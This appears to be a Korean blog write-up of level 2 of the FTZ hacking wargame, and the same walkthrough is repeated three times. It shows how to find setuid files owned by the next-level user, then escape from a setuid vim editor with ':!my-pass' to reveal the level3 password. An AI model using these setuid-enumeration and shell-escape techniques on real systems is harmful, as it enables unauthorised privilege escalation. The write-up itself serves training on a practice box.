뇌

신문물을 발견했다. 티스토리에 코드블럭 기능이 있다니 ...

level2 - id : level2 , pw : hacker or cracker

[level2@ftz level2]$ ls
hint  public_html  tmp
[level2@ftz level2]$ cat hint


텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...


[level2@ftz level2]$

hint를 보면 텍스트 파일 편집하는 중에 쉘 명령을 실행시킬 수 있나보다.

무슨 말인지 잘 모르겠지만 일단 level1과 같은 방법으로

level3의 user id를 갖고, setuid를 갖고있는 파일을 찾아보자.

[level2@ftz level2]$ find / -user level3 -perm -4000 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$

여기까진 같은 이전 문제와 같은 방법이므로 쉽게 풀 수 있다.

/usr/bin/editor 이라는 파일을 찾았다.

실행시켜보자.

[level2@ftz level2]$ /usr/bin/editor

~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~                                  VIM - Vi IMproved
~
~                                   version 6.1.320
~                               by Bram Moolenaar et al.
~                     Vim is open source and freely distributable
~
~                            Help poor children in Uganda!
~                    type  :help iccf<Enter>       for information
~
~                    type  :q<Enter>               to exit
~                    type  :help<Enter>  or  <F1>  for on-line help
~                    type  :help version6<Enter>   for version info
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~

아까 hint 에서 언급한 텍스트 파일 편집기이다.

vim 편집기로 파일을 편집하고 나갈 때

 보통 esc 키를 누르고,  :wq 를 입력하고 나간다.

( : 을 입력해야 명령어나 옵션을 입력할 수 있다.)

그런데 여기서

esc 키를 누르고, :! + 명령어를 입력하면 ?

vim 편집기에서 나가지 않고 쉘을 이용하여 외부명령어를 실행시킬 수 있다.

이 방법을 사용하여 my-pass 명령어로 level3의 비밀번호를 알아낼 수 있다.

:!my-pass

Level3 Password is "can you fly?".


shell returned 37

Hit ENTER or type command to continue

Level3 Password is "can you fly?".

감사합니다

신문물을 발견했다. 티스토리에 코드블럭 기능이 있다니 ...

level2 - id : level2 , pw : hacker or cracker

[level2@ftz level2]$ ls
hint  public_html  tmp
[level2@ftz level2]$ cat hint


텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...


[level2@ftz level2]$

hint를 보면 텍스트 파일 편집하는 중에 쉘 명령을 실행시킬 수 있나보다.

무슨 말인지 잘 모르겠지만 일단 level1과 같은 방법으로

level3의 user id를 갖고, setuid를 갖고있는 파일을 찾아보자.

[level2@ftz level2]$ find / -user level3 -perm -4000 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$

여기까진 같은 이전 문제와 같은 방법이므로 쉽게 풀 수 있다.

/usr/bin/editor 이라는 파일을 찾았다.

실행시켜보자.

[level2@ftz level2]$ /usr/bin/editor

~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~                                  VIM - Vi IMproved
~
~                                   version 6.1.320
~                               by Bram Moolenaar et al.
~                     Vim is open source and freely distributable
~
~                            Help poor children in Uganda!
~                    type  :help iccf<Enter>       for information
~
~                    type  :q<Enter>               to exit
~                    type  :help<Enter>  or  <F1>  for on-line help
~                    type  :help version6<Enter>   for version info
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~

아까 hint 에서 언급한 텍스트 파일 편집기이다.

vim 편집기로 파일을 편집하고 나갈 때

 보통 esc 키를 누르고,  :wq 를 입력하고 나간다.

( : 을 입력해야 명령어나 옵션을 입력할 수 있다.)

그런데 여기서

esc 키를 누르고, :! + 명령어를 입력하면 ?

vim 편집기에서 나가지 않고 쉘을 이용하여 외부명령어를 실행시킬 수 있다.

이 방법을 사용하여 my-pass 명령어로 level3의 비밀번호를 알아낼 수 있다.

:!my-pass

Level3 Password is "can you fly?".


shell returned 37

Hit ENTER or type command to continue

Level3 Password is "can you fly?".

감사합니다

신문물을 발견했다. 티스토리에 코드블럭 기능이 있다니 ...

level2 - id : level2 , pw : hacker or cracker

[level2@ftz level2]$ ls
hint  public_html  tmp
[level2@ftz level2]$ cat hint


텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...


[level2@ftz level2]$

hint를 보면 텍스트 파일 편집하는 중에 쉘 명령을 실행시킬 수 있나보다.

무슨 말인지 잘 모르겠지만 일단 level1과 같은 방법으로

level3의 user id를 갖고, setuid를 갖고있는 파일을 찾아보자.

[level2@ftz level2]$ find / -user level3 -perm -4000 2>/dev/null
/usr/bin/editor
[level2@ftz level2]$

여기까진 같은 이전 문제와 같은 방법이므로 쉽게 풀 수 있다.

/usr/bin/editor 이라는 파일을 찾았다.

실행시켜보자.

[level2@ftz level2]$ /usr/bin/editor

~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~                                  VIM - Vi IMproved
~
~                                   version 6.1.320
~                               by Bram Moolenaar et al.
~                     Vim is open source and freely distributable
~
~                            Help poor children in Uganda!
~                    type  :help iccf<Enter>       for information
~
~                    type  :q<Enter>               to exit
~                    type  :help<Enter>  or  <F1>  for on-line help
~                    type  :help version6<Enter>   for version info
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~

아까 hint 에서 언급한 텍스트 파일 편집기이다.

vim 편집기로 파일을 편집하고 나갈 때

 보통 esc 키를 누르고,  :wq 를 입력하고 나간다.

( : 을 입력해야 명령어나 옵션을 입력할 수 있다.)

그런데 여기서

esc 키를 누르고, :! + 명령어를 입력하면 ?

vim 편집기에서 나가지 않고 쉘을 이용하여 외부명령어를 실행시킬 수 있다.

이 방법을 사용하여 my-pass 명령어로 level3의 비밀번호를 알아낼 수 있다.

:!my-pass

Level3 Password is "can you fly?".


shell returned 37

Hit ENTER or type command to continue

Level3 Password is "can you fly?".

감사합니다